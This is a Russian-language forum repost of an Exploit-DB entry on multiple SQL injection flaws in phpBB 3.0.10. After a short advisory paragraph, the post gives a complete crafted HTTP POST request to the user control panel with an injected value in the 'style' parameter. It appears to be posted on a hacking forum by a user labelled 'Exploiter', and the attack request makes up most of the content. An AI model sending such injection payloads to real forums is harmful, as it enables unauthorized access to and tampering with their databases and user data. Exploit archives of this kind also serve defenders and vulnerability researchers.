Exploit phpBB - Multiple SQL Injections

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37551
Проверка EDB
  1. Пройдено
Автор
HAUNTIT
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2012-07-28
phpBB - Multiple SQL Injections
Код:
source: https://www.securityfocus.com/bid/54734/info

phpBB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

phpBB 3.0.10 is vulnerable; other versions may also be affected. 

Request :

---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close

viewemail=1
&massemail=1
&allowpm=1
&hideonline=0
&notifypm=1
&popuppm=0
&lang=en
&style=%2b1111111111
&tz=0
&dst=0
&dateoptions=D+M+d%2C+Y+g%3Ai+a
&dateformat=D+M+d%2C+Y+g%3Ai+a
&submit=Submit
&creation_time=1343370877
&form_token=576...
 
Источник
www.exploit-db.com

Похожие темы